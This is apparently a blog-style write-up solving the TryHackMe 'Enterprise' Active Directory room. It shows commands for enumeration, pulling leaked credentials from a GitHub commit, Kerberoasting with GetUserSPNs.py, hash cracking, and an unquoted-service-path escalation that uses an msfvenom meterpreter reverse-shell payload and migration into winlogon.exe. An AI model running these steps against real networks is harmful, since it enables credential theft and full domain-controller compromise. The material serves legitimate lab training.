Active Directory Pentest : Enterprise
Intro : Enterprise is a Hard machine on TryHackMe built around Active Directory pentesting. The goal is to compromise a Windows Domain Controller. The initial foothold is an RDP session as a Kerberoasted service account, and privilege escalation comes from exploiting an unquoted service path. So let's start.
Nmap Scan :
As usual we start with a basic Nmap scan. Several ports are open. Of these, 80 (HTTP), 88 (Kerberos) and 389 (LDAP) are the interesting ones, and 88 together with 389 tells us this host is a Domain Controller. RDP is also running on port 3389.
Tip : nmap -sVC -p- -Pn -T4 <ip> -vv
Web Enumeration :
First I visit the web server on port 80 and find nothing of interest.
Then I run a simple GoBuster scan to brute-force directories.
It finds robots.txt, but there are no useful entries in it, only a note telling us to enumerate the services rather than the web server. :)
On port 7990, however, there is a login form and a note saying that 'Enterprise-THM' has moved to GitHub.
So I search Google for it and find a GitHub repository belonging to a user called Nik.
The repository contains a script, mgmtScript.ps1, but its username and password fields are empty.
The commit history, though, holds an earlier commit that still has the username and password filled in; removing a secret from the latest version of a file does not remove it from the repository's history.
Cred → nik : ToastyBoi!
Exploiting AD :
So what can I do with these creds? I try RDP, but they are not accepted there. Next I dump the domain information over LDAP with a tool called ldapdomaindump.
Tip : ldapdomaindump <ip> -u 'LAB-ENTERPRISE\nik' -p <password>
This produces several informative files; domain_users.html is the interesting one, so I open it.
It lists every domain user together with their group memberships and account flags. It shows that nik cannot use RDP, but the bitbucket user can, because it is a member of Remote Desktop Users.
The bitbucket account has a Service Principal Name (SPN) registered, and any authenticated domain user, nik in our case, may ask the KDC for a service ticket for that SPN. That ticket is encrypted with the service account's password hash, so we can crack it offline to recover bitbucket's password. This is Kerberoasting.
We use the Impacket tool GetUserSPNs.py.
Tip : python3 GetUserSPNs.py -dc-ip <ip> 'LAB.ENTERPRISE.THM/nik:<password>' -request
This returns the bitbucket service ticket as a $krb5tgs$ hash, not something we can use directly; we have to crack it with John. I put the whole hash line into hash.txt.
Tip : john --wordlist=<path> hash.txt
RDP Cred → bitbucket : <???>
Then I use xfreerdp to start an RDP session. You can also use Remmina or rdesktop.
Tip : xfreerdp /u:<username> /p:<password> /v:<ip>
User Access :
And I get the first (user) flag on the user's Desktop.
Privilege Escalation :
Now it's time for some privesc. I transfer winPEASx64.exe to the victim and run it to automate the enumeration. It reports an unquoted service path that may be exploitable, belonging to a service called zerotieroneservice.
Path : C:\Program Files (x86)\Zero Tier\Zero Tier one
Look at the path: it is not enclosed in quotation marks, yet it contains spaces.
More info → https://tryhackme.com/room/windows10privesc
When the Service Control Manager starts the service, Windows tries to interpret the unquoted path at each space in turn: C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Zero.exe, C:\Program Files (x86)\Zero Tier\Zero.exe, C:\Program Files (x86)\Zero Tier\Zero Tier.exe, and only then the real binary inside Zero Tier one. So if one of those directories is writable by us, we can drop a payload with the matching name there and it will run with the service's privileges.
I check the Zero Tier directory, and C:\Program Files (x86)\Zero Tier\ is indeed writable by our user.
Then I make a Windows Payload with msfvenom.
Tip : msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tun0_ip> LPORT=<any_port> -f exe -o shell.exe
Then I transfer this file to the victim machine.
Note : Save the payload in C:\Program Files (x86)\Zero Tier\ under the name Zero.exe; that is the candidate Windows tries before it descends into the Zero Tier one directory, so a file with any other name in that folder is simply ignored.
Then I set up the matching handler in msfconsole (multi/handler with the same payload, LHOST and LPORT) and run it.
Then, on the victim machine, stop and restart the zerotieroneservice service found in the winPEAS result, so that the SCM launches the planted binary.
Moments later a reverse connection arrives, running with the privileges of the service account, i.e. SYSTEM.
But the meterpreter session dies after a moment: the SCM expects the process it launched to register as a service, and when the payload never does, the service start fails and the process is killed. So we use a trick. In the meterpreter session run the command below.
Tip : migrate -N winlogon.exe
Migrating into winlogon.exe, which runs as SYSTEM and is not tied to the failed service, keeps the session alive, and you get a stable shell with full administrative (SYSTEM) privileges.
And at last I get the root flag. Bingo!
So we completed the room and learned about Active Directory pentesting.
If you enjoyed it, don't forget to follow me for more articles.
THANKS FOR READING!
Happy Hacking~